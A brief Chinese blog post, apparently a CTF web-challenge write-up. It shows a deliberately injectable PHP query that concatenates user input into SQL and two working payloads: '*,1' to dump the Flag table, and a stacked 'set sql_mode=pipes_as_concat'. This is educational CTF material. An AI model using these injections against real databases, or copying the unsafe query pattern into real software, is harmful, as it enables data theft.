这题属实是脑洞web题。。。
根据题目提示还是sql注入,但是过滤了一万个关键字,直接去看wp
sql语句长下面这样:
$sql = "select ".$post['query']."||flag from Flag";mysqli_multi_query($MysqlLink,$sql);do{if($res = mysqli_store_result($MysqlLink)){while($row = mysqli_fetch_row($res)){print_r($row);}}}while(@mysqli_next_result($MysqlLink));
于是就有了两种解法:
- 构造
select *,1||flag from Flag;,直接得出Flag表中的所有内容,直接传入*不行,因为逻辑运算符||无法运算。 - 设置
set sql_mode=pipes_as_concat,这句话的效果是将||视为连接符,而不是逻辑运算符。
若有收获,就点个赞吧
0 人点赞
